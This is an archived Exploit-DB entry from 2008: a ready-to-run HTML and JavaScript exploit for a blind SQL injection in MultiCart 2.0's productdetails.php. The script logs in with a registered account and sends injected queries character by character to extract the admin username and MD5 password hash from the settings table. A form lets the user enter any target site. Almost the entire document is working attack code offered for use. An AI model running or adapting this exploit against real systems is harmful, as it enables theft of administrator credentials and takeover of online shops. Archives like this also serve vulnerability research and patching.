MultiCart 2.0 - 'productdetails.php' SQL Injection

EDB-ID:

5166


Author:

t0pP8uZz

Type:

webapps


Platform:

PHP

Date:

2008-02-20


<html>
<head>
<style type="text/css">
<!--
.style1{color: #CC0000}
.style2 { color: #000000;  font-size: 12px;}
.style3 {color: #FF0000; font-weight: bold; font-size: 12px; }
.style4 {color: #FF0000; font-size: 10px;}
-->
</style>
<title>MultiCart 2.0 Remote SQL Injection Vulnerbility</title>
<script language="Javascript" type="text/javascript">
/*
	-------------------------------------------------------------------------------
	- MultiCart Blind SQL Injection Exploit (productdetails.php) -
	- Info ----------------------------------------------------------------------
	- SAVE AS exploit.HTML and RUN in FIREFOX -----------------
	- Author: t0pP8uZz & xprog -------------------------------------------
	- Exploit Coded By t0pP8uZz -----------------------------------------
	- Site: h4ck-y0u.org / milw0rm.com ---------------------------------
	------------------------------------------------------------------------------
	- Needs Registration First!           ------------------------------------
	- Peace --------------------------------------------------------------------
	------------------------------------------------------------------------------
*/

var site, user, pass, tbl, pid, res = "";

function Start() {
	
	site = document.getElementById("site").value;
	user = document.getElementById("user").value;
	pass = document.getElementById("pass").value;
	tbl  = document.getElementById("tbl").value;
	pid  = document.getElementById("pid").value;
	
	Login();
	Main(1, 48);
}

function Main(substr, num) {

	var url = site+"/productdetails.php?productid="+pid+"%20and%20ascii(substring((SELECT concat(admin_name,0x3a,admin_password) FROM "+tbl+"),"+substr+",1))="+num+"/*";
	
	netscape.security.PrivilegeManager.enablePrivilege("UniversalBrowserRead");
	
	var xmlhttp = new XMLHttpRequest();
	
	xmlhttp.onreadystatechange = function() {
	
		if(xmlhttp.readyState == 4) {
		
			var content = xmlhttp.responseText;
			if(content.match(/doesn't exist/i)) { alert("Table '"+tbl+"' Doesnt Exist! Try Another.."); return false; }
			
			var ele = document.getElementById("output");
			if(!content.match(/SQL syntax/i)) { res += String.fromCharCode((num)); ele.value = res; num = 48; substr++; }
			else { if(num == 59) { num = 96; } else { num++; }}
			
			if(res.match(":")) { 
				var check = res.split(":");
				if(check[1].length >= 32) { alert("Site Exploited! Admin Details: "+res); return true;}
			}
			Main(substr, num);
		}
	};
	xmlhttp.open("GET", url, true);
	xmlhttp.send(null);
};


function Login() {

	var data = 'txtUserName='+user+'&txtPassword='+pass+'&loginbox=+';
	netscape.security.PrivilegeManager.enablePrivilege("UniversalBrowserRead");
	
	try {
		var xmlhttp = new XMLHttpRequest();
	}
	catch(e) { alert("Use Firefox!\n\n\nError: " + e.description); }
	
	xmlhttp.open("POST", site + "/index.php", true);
	
	xmlhttp.setRequestHeader("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9");
	xmlhttp.setRequestHeader("Content-Length", data.length);
	xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
	
	xmlhttp.send(data);
};
</script>
</head>
<body>
<p class="style1">- MultiCart 2.0 Remote Blind SQL Injection Vulnerbility -</p>
<p class="style2">Site: <input type="text" id="site" /> (URL to multicart site ie: http://www.site.com/multicart)</p>
<p class="style2">Table: <input type="text" id="tbl" /> (settings table name, default: "multicart_settings" others used: "mc_settings", "settings")</p>
<p class="style2">User: <input type="text" id="user" /> (Register on the site first, then enter username here)</p>
<p class="style2">Pass: <input type="text" id="pass" /> (Register on the site first, then enter password here)</p>
<p class="style2">PID: <input type="text" id="pid" /> (a valid product ID)</p>
<p class="style2"><input type="button" onclick="Start();" id="button" value="Exploit" /></p>
<p class="style3">Output: <input type="text" id="output" size="100" /></p>
<p class="style2">Notes: MultiCart uses the MD5 algorithms, The admin login is at /admin/</p>
<p class="style4">Coded By t0pP8uZz - h4ck-y0u.org</p>
</body>
</html>

# milw0rm.com [2008-02-20]